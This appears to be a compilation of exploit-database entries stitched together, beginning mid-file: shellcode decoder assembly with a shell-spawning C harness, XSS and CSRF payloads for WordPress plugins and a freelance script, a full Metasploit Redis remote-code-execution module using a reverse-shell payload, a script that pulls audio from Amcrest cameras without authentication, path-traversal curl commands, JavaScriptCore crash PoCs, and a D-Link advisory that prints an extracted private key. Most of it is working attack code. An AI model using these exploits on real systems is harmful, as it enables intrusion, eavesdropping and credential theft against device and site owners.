  encoded : dw 0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539

decoder:
  lea rsi, [rel encoded]

  xor rcx, rcx
  xor r9,r9
  xor r10,r10

  mov word cx, [rsi]
  inc rsi
  inc rsi
  mov word r9w, [rsi]
  inc rsi
  inc rsi
  push rsi
  mov rdi, rsi
main: ;       to deal with 0xff on the original shellcode
  mov word r10w,[rsi]
  xor r10w, r9w
  jz second_check
main2:
  shr r10, cl
  not word r10w
  mov byte [rdi], r10b
  inc rsi
  inc rsi
  inc rdi
  jmp short main

second_check:
  mov word r10w, [rsi+2]
  xor r10w, r9w
  jz call_encoded
  mov word r10w, [rsi]
  xor r10w, r9w
  jmp main2

call_encoded:
  call [rsp]

###################################### final shellcode ######################################

pedro@ubuntu>nasm -felf64 decoder.asm -o decoder.o
pedro@ubuntu>echo;objdump -d ./decoder.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d''|tr -s ''|tr '\t'''|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo

"\xeb\x48\x04\x01\x39\x05\x49\x0e\xd9\x09\xc9\x06\xc9\x0f\x49\x0e\x79\x01\x39\x08\xe9\x0c\x59\x0c\x29\x0c\x39\x08\x39\x08\xf9\x0d\x49\x0c\xf9\x0f\x49\x0e\x59\x02\xb9\x04\xc9\x0f\x49\x0e\x59\x02\xe9\x04\xb9\x0f\x49\x0e\x59\x02\xa9\x04\x49\x0e\xf9\x02\xc9\x06\x79\x09\x39\x0a\x99\x0a\x39\x05\x39\x05\x48\x8d\x35\xb1\xff\xff\xff\x48\x31\xc9\x4d\x31\xc9\x4d\x31\xd2\x66\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x66\x44\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x56\x48\x89\xf7\x66\x44\x8b\x16\x66\x45\x31\xca\x74\x15\x49\xd3\xea\x66\x41\xf7\xd2\x44\x88\x17\x48\xff\xc6\x48\xff\xc6\x48\xff\xc7\xeb\xe1\x66\x44\x8b\x56\x02\x66\x45\x31\xca\x74\x0a\x66\x44\x8b\x16\x66\x45\x31\xca\xeb\xd6\xff\x14\x24"

pedro@ubuntu>gcc -fno-stack-protector -z execstack testShellcode.c -o testShellcode
pedro@ubuntu>./testShellcode 
Shellcode Length:  168
$ whoami
pedro
*/


#include<stdio.h>
#include<string.h>


unsigned char code[] = \
"\xeb\x48\x04\x01\x39\x05\x49\x0e\xd9\x09\xc9\x06\xc9\x0f\x49\x0e\x79\x01\x39\x08\xe9\x0c\x59\x0c\x29\x0c\x39\x08\x39\x08\xf9\x0d\x49\x0c\xf9\x0f\x49\x0e\x59\x02\xb9\x04\xc9\x0f\x49\x0e\x59\x02\xe9\x04\xb9\x0f\x49\x0e\x59\x02\xa9\x04\x49\x0e\xf9\x02\xc9\x06\x79\x09\x39\x0a\x99\x0a\x39\x05\x39\x05\x48\x8d\x35\xb1\xff\xff\xff\x48\x31\xc9\x4d\x31\xc9\x4d\x31\xd2\x66\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x66\x44\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x56\x48\x89\xf7\x66\x44\x8b\x16\x66\x45\x31\xca\x74\x15\x49\xd3\xea\x66\x41\xf7\xd2\x44\x88\x17\x48\xff\xc6\x48\xff\xc6\x48\xff\xc7\xeb\xe1\x66\x44\x8b\x56\x02\x66\x45\x31\xca\x74\x0a\x66\x44\x8b\x16\x66\x45\x31\xca\xeb\xd6\xff\x14\x24";

void main(){
  printf("Shellcode Length:  %zu\n",strlen(code));

  int (*ret)() = (int(*)())code;

  ret();

}

# Exploit Title: Real Estate 7 - Real Estate WordPress Theme v2.8.9 Persistent XSS Injection
# Google Dork: inurl:"/wp-content/themes/realestate-7/"
# Date: 2019/07/20
# Author: m0ze
# Vendor Homepage: https://contempothemes.com
# Software Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
# Version: <= 2.8.9
# Tested on: NginX
# CVE: -
# CWE: CWE-79

Details & Description:
The «Real Estate 7» premium WordPress theme is vulnerable to persistent XSS
injection that allows an attacker to inject JavaScript or HTML code into
the website front-end.

Special Note:
- 7.151 Sales
- If pre moderation is enabled, then u have a huge chance to steal an admin
or moderator cookies.
- U can edit any existed listing on the website by changing the unique ID
-> https://site.com/edit-listing/?listings=XXX (where XXX is WordPress post
ID, u can find it inside <body> tag class).

PoC [Persistent XSS Injection]:
First of all, register a new account as a seller or agent, log in and
choose free membership package @ the dashboard. After that u'll be able to
submit a new listing -> https://site.com/submit-listing/
For persistent XSS injection u need to add ur payload inside the «Vitrual
Tour Embed» text area (on the «DETAILS» step) and then press «Submit»
button.
Example: <img src="x" onerror="(alert)(`m0ze`)">

# Exploit Title: GigToDo - Freelance Marketplace Script v1.3 Persistent XSS Injection
# Google Dork: -
# Date: 2019/07/28
# Author: m0ze
# Vendor Homepage: https://www.gigtodoscript.com
# Software Link: https://codecanyon.net/item/gigtodo-freelance-marketplace-script/23855397
# Version: <= 1.3
# Tested on: NginX/1.15.10
# CVE: -
# CWE: CWE-79


Details & Description:
The «GigToDo - Freelance Marketplace Script» web-application is vulnerable
to reflected and persistent XSS injections that allows an attacker to
inject JavaScript/HTML code into the front-end, redirect visitor to another
website or steal admin cookies.


PoC [Persistent XSS Injection]:
Register a new account, log in and go to the
https://www.site.com/proposals/create_proposal page. Vulnerable text area
is «Proposal's Description», so paste your payload inside, fill in other
fields and save the data TWICE or your payload WILL NOT WORK. So literally
paste your payload inside the «Proposal's Description» text area and scroll
down to «Update Proposal» button, press it and your data will be saved.
After that u'll be redirected to
https://www.site.com/proposals/view_proposals.php page. Select your created
proposal and press green square dropdown menu on the right («Actions»
column) and click on «Edit» link. After that just don't change anything,
scroll down to «Update Proposal» button, press it and your data will be
saved ONE MORE TIME. That's it, now your payload will work.
Example #1: <h1
onmouseover=';alert(`m0ze`);'>m0ze</h1>1"--><svg/onload=';alert(`Script is
fully protected from SQL Injection and XSS ©`);'><img src='x'
onerror=';alert(`For sure lol`);'>
Example #2: <h1 onmouseover=';alert(`Greetz from
m0ze`);'>m0ze</h1>1"--><svg/onload=';window.location.replace(`
https://twitter.com/m0ze_ru`);'>

# Exploit Title: Cross Site Request Forgery in Wordpress Simple Membership plugin
# Date: 2019-07-27
# Exploit Author: rubyman
# Vendor Homepage: https://wordpress.org/plugins/simple-membership/
# wpvulndb : https://wpvulndb.com/vulnerabilities/9482
# Version: 3.8.4
# Tested on: Windows 8.1
# CVE : CVE-2019-14328

#
# Change localhost to your desired host
#

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/wordpress/wp-admin/admin.php?page=simple_wp_membership&member_action=bulk" method="POST">
<input type="hidden" name="swpm_bulk_change_level_from" value="2" />
<input type="hidden" name="swpm_bulk_change_level_to" value="3" />
<input type="hidden" name="swpm_bulk_change_level_process" value="Bulk Change Membership Level" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper
  include Msf::Auxiliary::Redis

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Redis Unauthenticated Code Execution',
'Description'    => %q{
        This module can be used to leverage the extension functionality added by Redis 4.x and 5.x
        to execute arbitrary code. To transmit the given extension it makes use of the feature of Redis
        which called replication between master and slave.
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Green-m  <greenm.xxoo[at]gmail.com>'     # Metasploit module
        ],
'References'     =>
        [
          [ 'URL', 'https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf'],
          [ 'URL', 'https://github.com/RedisLabs/RedisModulesSDK']
        ],

'Platform'       => 'linux',
'Arch'           => [ARCH_X86, ARCH_X64],
'Targets'        =>
        [
          ['Automatic',  {} ],
        ],
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
'SRVPORT' => '6379'
        },
'Privileged'     => false,
'DisclosureDate' => 'Nov 13 2018',
'DefaultTarget'  => 0,
'Notes'          =>
        {
'Stability'   => [ SERVICE_RESOURCE_LOSS],
'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ]
        },
      ))

    register_options(
      [
        Opt::RPORT(6379),
        OptBool.new('CUSTOM', [true, 'Whether compile payload file during exploiting', true])
      ]
    )

    register_advanced_options(
      [
        OptString.new('RedisModuleInit', [false, 'The command of module to load and unload. Random string as default.']),
        OptString.new('RedisModuleTrigger', [false, 'The command of module to trigger the given function. Random string as default.']),
        OptString.new('RedisModuleName', [false, 'The name of module to load at first. Random string as default.'])
      ]
    )
    deregister_options('URIPATH', 'THREADS', 'SSLCert')
  end

  #
  # Now tested on redis 4.x and 5.x
  #
  def check
    connect
    # they are only vulnerable if we can run the CONFIG command, so try that
    return Exploit::CheckCode::Safe unless (config_data = redis_command('CONFIG', 'GET', '*')) && config_data =~ /dbfilename/

    if (info_data = redis_command('INFO')) && /redis_version:(?<redis_version>\S+)/ =~ info_data
      report_redis(redis_version)
    end

    Exploit::CheckCode::Vulnerable
  ensure
    disconnect
  end

  def exploit
    if check_custom
      @module_init_name = datastore['RedisModuleInit']    || Rex::Text.rand_text_alpha_lower(4..8)
      @module_cmd       = datastore['RedisModuleTrigger'] || "#{@module_init_name}.#{Rex::Text.rand_text_alpha_lower(4..8)}"
    else
      @module_init_name = 'shell'
      @module_cmd       = 'shell.exec'
    end

    if srvhost == '0.0.0.0'
      fail_with(Failure::BadConfig, 'Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.')
    end

    #
    # Prepare for payload.
    #
    #  1. Use custcomed payload, it would compile a brand new file during running, which is more undetectable.
    #     It's only worked on linux system.
    #
    #  2. Use compiled payload, it's avaiable on all OS, however more detectable.
    #
    if check_custom
      buf = create_payload
      generate_code_file(buf)
      compile_payload
    end

    connect

    #
    # Send the payload.
    #
    redis_command('SLAVEOF', srvhost, srvport.to_s)
    redis_command('CONFIG', 'SET', 'dbfilename', "#{module_file}")
    ::IO.select(nil, nil, nil, 2.0)

    # start the rogue server
    start_rogue_server
    # waiting for victim to receive the payload.
    Rex.sleep(1)
    redis_command('MODULE', 'LOAD', "./#{module_file}")
    redis_command('SLAVEOF', 'NO', 'ONE')

    # Trigger it.
    print_status('Sending command to trigger payload.')
    pull_the_trigger

    # Clean up
    Rex.sleep(2)
    register_file_for_cleanup("./#{module_file}")
    #redis_command('CONFIG', 'SET', 'dbfilename', 'dump.rdb')
    #redis_command('MODULE', 'UNLOAD', "#{@module_init_name}")

  ensure
    disconnect
  end

  #
  # We pretend to be a real redis server, and then slave the victim.
  #
  def start_rogue_server
    socket = Rex::Socket::TcpServer.create({'LocalHost'=>srvhost,'LocalPort'=>srvport})
    print_status("Listening on #{srvhost}:#{srvport}")
    rsock = socket.accept()
    vprint_status('Accepted a connection')

    # Start negotiation
    while true
      request = rsock.read(1024)
      vprint_status("in<<< #{request.inspect}")
      response = ""
      finish = false

      case
      when request.include?('PING')
        response = "+PONG\r\n"
      when request.include?('REPLCONF')
        response = "+OK\r\n"
      when request.include?('PSYNC') || request.include?('SYNC')
        response  = "+FULLRESYNC #{'Z'*40} 1\r\n"
        response << "$#{payload_bin.length}\r\n"
        response << "#{payload_bin}\r\n"
        finish = true
      end

      if response.length < 200
        vprint_status("out>>> #{response.inspect}")
      else
        vprint_status("out>>> #{response.inspect[0..100]}......#{response.inspect[-100..-1]}")
      end

      rsock.put(response)

      if finish
        print_status('Rogue server close...')
        rsock.close()
        socket.close()
        break
      end
    end
  end

  def pull_the_trigger
    if check_custom
      redis_command("#{@module_cmd}")
    else
      execute_cmdstager
    end
  end

  #
  # Parpare command stager for the pre-compiled payload.
  # And the command of module is hard-coded.
  #
  def execute_command(cmd, opts = {})
    redis_command('shell.exec',"#{cmd.to_s}") rescue nil
  end

  #
  # Generate source code file of payload to be compiled dynamicly.
  #
  def generate_code_file(buf)
    template       = File.read(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.erb'))
    File.open(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.c'), 'wb') { |file| file.write(ERB.new(template).result(binding))}
  end

  def compile_payload
    make_file = File.join(Msf::Config.data_directory, 'exploits', 'redis', 'Makefile')
    vprint_status("Clean old files")
    vprint_status(%x|make -C #{File.dirname(make_file)}/rmutil clean|)
    vprint_status(%x|make -C #{File.dirname(make_file)} clean|)

    print_status('Compile redis module extension file')
    res = %x|make -C #{File.dirname(make_file)} -f #{make_file} && echo true|
    if res.include? 'true'
      print_good("Payload generated successfully! ")
    else
      print_error(res)
      fail_with(Failure::BadConfig, 'Check config of gcc compiler.')
    end
  end

  #
  # check the environment for compile payload to so file.
  #
  def check_env
    # check if linux
    return false unless %x|uname -s 2>/dev/null|.include? "Linux"
    # check if gcc installed
    return false unless %x|command -v gcc && echo true|.include? "true"
    # check if ld installed
    return false unless %x|command -v ld && echo true|.include? "true"

    true
  end

  def check_custom
    return @custom_payload if @custom_payload

    @custom_payload = false
    @custom_payload = true if check_env && datastore['CUSTOM']

    @custom_payload
  end

  def module_file
    return @module_file if @module_file
    @module_file = datastore['RedisModuleName']  || "#{Rex::Text.rand_text_alpha_lower(4..8)}.so"
  end

  def create_payload
    p = payload.encoded
    Msf::Simple::Buffer.transform(p, 'c', 'buf')
  end

  def payload_bin
    return @payload_bin if @payload_bin
    if check_custom
      @payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.so'))
    else
      @payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'exp',  'exp.so'))
    end
    @payload_bin
  end
end

##
# Exploit Title: Unauthenticated Audio Streaming from Amcrest Camera
# Shodan Dork: html:"@WebVersion@"
# Date: 08/29/2019
# Exploit Author: Jacob Baines
# Vendor Homepage: https://amcrest.com/
# Software Link: https://amcrest.com/firmwaredownloads
# Affected Version: V2.520.AC00.18.R
# Fixed Version: V2.420.AC00.18.R
# Tested on: Tested on Amcrest IP2M-841 but known to affect other Dahua devices.
# CVE : CVE-2019-3948
# Disclosure: https://www.tenable.com/security/research/tra-2019-36
# Disclosure: https://sup-files.s3.us-east-2.amazonaws.com/Firmware/IP2M-841/JS+IP2M-841/Changelog/841_721_HX1_changelog_20190729.txt
#
# To decode the scripts output using ffplay use:
#   ffplay -f alaw -ar 8k -ac 1 [poc output]
# Note that this assumes the camera is using the default encoding options.
##
import argparse
import socket
import struct
import sys

##
# Read in the specified amount of data. Continuing looping until we get it all...
# what could go wrong?
#
# @return the data we read in
##
def recv_all(sock, amount):
  data = ''
  while len(data) != amount:
    temp_data = sock.recv(amount - len(data))
    data = data + temp_data

  return data

top_parser = argparse.ArgumentParser(description='Download audio from the HTTP videotalk endpoint')
top_parser.add_argument('-i', '--ip', action="store", dest="ip", required=True, help="The IPv4 address to connect to")
top_parser.add_argument('-p', '--port', action="store", dest="port", type=int, help="The port to connect to", default="80")
top_parser.add_argument('-o', '--output', action="store", dest="output", help="The file to write the audio to")
top_parser.add_argument('-b', '--bytes', action="store", dest="bytes", type=int, help="The amount of audio to download", default="1048576")
args = top_parser.parse_args()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(True)

print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
sock.connect((args.ip, args.port))
print "[+] Connected!"

request = ('GET /videotalk HTTP/1.1\r\n' +
'Host: ' + args.ip + ':' + str(args.port) + '\r\n' +
'Range: bytes=0-\r\n' +
'\r\n')
sock.sendall(request)

status = ''
header = ''

# read in the HTTP response. Store the status.
while (header != '\r\n'):
  header = header + sock.recv(1);
  if (header.find('\r\n') > 0):
    header = header.strip()
    if (len(status) == 0):
      status = header
    header = ''

if (status.find('200 OK') == -1):
  print '[-] Bad HTTP status. We received: "' + status + '"'
  sock.close()
  exit()
else:
  print '[+] Downloading ' + str(args.bytes) + ' bytes of audio ...'

total_audio = ''
while (len(total_audio) < args.bytes):

  # read in the header length
  header_length = recv_all(sock, 4)
  hlength = struct.unpack("I", header_length)[0]
  if (hlength != 36):
    print '[-] Unexpected header length'
    sock.close()
    exit()

  # read in the header and extract the payload length
  header = recv_all(sock, hlength)
  plength = struct.unpack_from(">H", header)[0]
  if (plength != 368):
    print '[-] Unexpected payload length'
    sock.close()
    exit()

  # there is a seq no in the header but since this is over
  # tcp is sort of useless.

  dhav = header[2:6]
  if (dhav != "DHAV"):
    print '[-] Invalid header'
    exit(0)

  # extract the audio. I'm really not sure what the first 6 bytes are
  # but the last 8 serve as a type of trailer
  whatami = recv_all(sock, 6)
  audio = recv_all(sock, plength - hlength - 12)
  trailer = recv_all(sock, 8)

  if (trailer != 'dhavp\x01\x00\x00'):
    print '[-] Invalid end of frame'
    sock.close()
    exit()

  total_audio = total_audio + audio
  sys.stdout.write('\r'+ str(len(total_audio)) + " / " + str(args.bytes))
  sys.stdout.flush()

print ''
print '[+] Finished receiving audio.'
print '[+] Closing socket'

out_file = open(args.output, 'wb')
out_file.write(total_audio)
out_file.close()

sock.close()

WP Fastest Cache is a Wordpress plugin that creates static html files
from the dynamic WordPress blog in order to speed up operation.

Version 0.8.9.5 and below of the plugin was identified being
vulnerable to directory traversal attacks.

The first two are Windows only, the 3rd one is generic. The Windows
specific ones were tested on WampServer (so with Apache's Httpd).

#1:
The impact is reading files outside of the cache directory. The
attacker has control over the directory only, the file is selected as
the first hit of the scandir results in descending order.


curl --path-as-is http://vulnerable-host.tld/wpfc-minified/..\..\..\/stuff.php

<?php
/**
 * XML-RPC protocol support for WordPress
 *
 * @package WordPress
 */
...

#2:
The cacheFilePath construction logic in cache.php can be abused to
mount a similar attack as vuln #1 and read index.html files outside
the cache directory:

curl --path-as-is http://vulnerable-host.tld/..\..\..\/whatever.html\/..
some html content outside the cache directory
<!-- via php -->


#3:
If the Google Translate plugin is active on the victim system then it
is also possible to create index.html files outside the cache
directory:

curl -v --header "X-GT-LANG: ../../../.."
http://vulnerable-host.tld/some-article/

In configurations where the html extension has higher precedence over
php in the webserver's DirectoryIndex configuration, this could
actually change the front page of the victim website.


Remediation: update to plugin version 0.8.9.6

Imre

JSC: A bug in BytecodeGenerator::emitEqualityOpImpl 

Related CVE Numbers: CVE-2019-8684.


PoC:
let a = (1 || typeof 1) === 'string';

Generated bytecode:
<global>#BPmgTo:[0x7ff1965a0000->0x7ff1965a8000, NoneGlobal, 37]: 11 instructions (0 wide instructions, 2 instructions with metadata); 225 bytes (188 metadata bytes); 1 parameter(s); 10 callee register(s); 6 variable(s); scope at loc4
[   0] enter              
[   1] get_scope          loc4
[   3] mov                loc5, loc4
[   6] check_traps        
[   7] mov                loc6, Undefined(const0)
[  10] resolve_scope      loc7, loc4, 0, GlobalProperty, 0
[  17] mov                loc8, Int32: 1(const1)
[  20] jtrue              loc8, 6(->26)
[  23] is_cell_with_type  loc8, Int32: 1(const1), StringType
[  27] put_to_scope       loc7, 0, loc8, 1048576<DoNotThrowIfNotFound|GlobalProperty|Initialization>, 0, 0
[  35] end                loc6

Identifiers:
  id0 = a

Constants:
   k0 = Undefined
   k1 = Int32: 1: in source as integer
   k2 = String (atomic) (identifier): string, StructureID: 9553

Here the jtrue instruction is pointing somewhere in the middle of the is_cell_with_type instruction. This is due to the bug in BytecodeGenerator::emitEqualityOpImpl which doesn't consider the case where m_lastOpcodeID is op_end which can indicate that the current position is a jump target. As a result, the method replaced wrongly the typeof instruction with the is_cell_with_type instruction.

Vulnerable method:
bool BytecodeGenerator::emitEqualityOpImpl(RegisterID* dst, RegisterID* src1, RegisterID* src2)
{
    if (m_lastInstruction->is<OpTypeof>()) {
        auto op = m_lastInstruction->as<OpTypeof>();
        if (src1->index() == op.m_dst.offset()
&& src1->isTemporary()
&& m_codeBlock->isConstantRegisterIndex(src2->index())
&& m_codeBlock->constantRegister(src2->index()).get().isString()) {
            const String& value = asString(m_codeBlock->constantRegister(src2->index()).get())->tryGetValue();
            if (value == \"undefined\") {
                rewind();
                OpIsUndefined::emit(this, dst, op.m_value);
                return true;
            }
            if (value == \"boolean\") {
                rewind();
                OpIsBoolean::emit(this, dst, op.m_value);
                return true;
            }
            if (value == \"number\") {
                rewind();
                OpIsNumber::emit(this, dst, op.m_value);
                return true;
            }
            if (value == \"string\") {
                rewind();
                OpIsCellWithType::emit(this, dst, op.m_value, StringType);
                return true;
            }
            if (value == \"symbol\") {
                rewind();
                OpIsCellWithType::emit(this, dst, op.m_value, SymbolType);
                return true;
            }
            if (Options::useBigInt() && value == \"bigint\") {
                rewind();
                OpIsCellWithType::emit(this, dst, op.m_value, BigIntType);
                return true;
            }
            if (value == \"object\") {
                rewind();
                OpIsObjectOrNull::emit(this, dst, op.m_value);
                return true;
            }
            if (value == \"function\") {
                rewind();
                OpIsFunction::emit(this, dst, op.m_value);
                return true;
            }
        }
    }

    return false;
}


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.



Found by: lokihardt@google.com

JSC: YarrJIT: A bug in initParenContextFreeList 



void initParenContextFreeList()
{
    RegisterID parenContextPointer = regT0;
    RegisterID nextParenContextPointer = regT2;

    size_t parenContextSize = ParenContext::sizeFor(m_parenContextSizes);

    parenContextSize = WTF::roundUpToMultipleOf<sizeof(uintptr_t)>(parenContextSize);

    // Check that the paren context is a reasonable size.
    if (parenContextSize > INT16_MAX)
        m_abortExecution.append(jump());

    Jump emptyFreeList = branchTestPtr(Zero, freelistRegister);
    move(freelistRegister, parenContextPointer);
    addPtr(TrustedImm32(parenContextSize), freelistRegister, nextParenContextPointer);
    addPtr(freelistRegister, freelistSizeRegister);
    subPtr(TrustedImm32(parenContextSize), freelistSizeRegister);

    Label loopTop(this);
    Jump initDone = branchPtr(Above, nextParenContextPointer, freelistSizeRegister);
    storePtr(nextParenContextPointer, Address(parenContextPointer, ParenContext::nextOffset()));
    move(nextParenContextPointer, parenContextPointer);
    addPtr(TrustedImm32(parenContextSize), parenContextPointer, nextParenContextPointer);
    jump(loopTop);

    initDone.link(this);
    storePtr(TrustedImmPtr(nullptr), Address(parenContextPointer, ParenContext::nextOffset()));
    emptyFreeList.link(this);
}

class PatternContextBufferHolder {
public:
    PatternContextBufferHolder(VM& vm, bool needBuffer)
        : m_vm(vm)
        , m_needBuffer(needBuffer)
    {
        if (m_needBuffer) {
            m_buffer = m_vm.acquireRegExpPatternContexBuffer();
            m_size = VM::patternContextBufferSize;
        } else {
            m_buffer = nullptr;
            m_size = 0;
        }
    }


The method initParenContextFreeList tries to ensure that the size of the paren context doesn't get above INT16_MAX. This implies that the size of the buffer is equal to INT16_MAX. But the actual size is VM::patternContextBufferSize (8192) which is lower than that. So up to 24575 (INT16_MAX - 8192) bytes can be overwritten.

PoC:
let s = '';
for (let i = 0; i < 1000; i++) {
    s += '(?:a){0,2}';
}

let r = new RegExp(s);
for (let i = 0; i < 1000; i++)
''.match(r);


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.



Found by: lokihardt@google.com

# Security Advisory - 22/07/2019

## Multiple vulnerabilities found in the D-Link 6600-AP device running
the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced
anymore but the support is still provided by D-Link as per described
on the D-Link website. Not that this product is built for business
customers of D-Link and we can expect to have thousands of devices at
risk. Code base shared with DWL-3600AP and DWL-8610AP

### This advisory is sent to D-Link the 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!

### Affected Product
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP

### Firmware version
4.2.0.14 Revision Ax date:      21/03/2019

### Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

### Product Identifier
WLAN-EAP

### Hardware Version
A2

### Manufacturer
D-LINK

## Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point
for business environments. With high data transmission speeds, load
balancing features, it can be deployed as a standalone wireless Access
Point or used as the foundation for a managed wireless network.
Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

## List of Vulnerabilities

 1. CVE-2019-14338 - Post-authenticated XSS
 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private
Key extraction
through http command
 3. CVE-2019-14333 - Pre-authenticated Denial of service leading to
the reboot of the AP
 4. CVE-2019-14337 - Escape shell in the restricted command line interface
 5. CVE-2019-14335 - Post-authenticated Denial of service leading to
the reboot of the AP
 6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
 7. CVE-2019-14332 - Use of weak ciphers for SSH

### 1. Post-authenticated XSS
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14338
#### Proof-of concept

Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>

Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>

### 2. Post-authenticated Certificate and RSA Private Key extraction
through http command
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14334
#### Proof-of concept

http://10.90.90.91/sslcert-get.cgi?

Result of the command: File "mini_httpd.pem" automatically extracted

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee
Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o
BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B
vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t
7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c
unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk
1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6
J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14
yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z
0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc
fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB
i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb
dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ
OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ
VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9
J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr
H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw
uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy
yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd
pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co
paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8
1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm
fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS
okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px
bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx
MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp
bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL
MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU
MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG
A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE
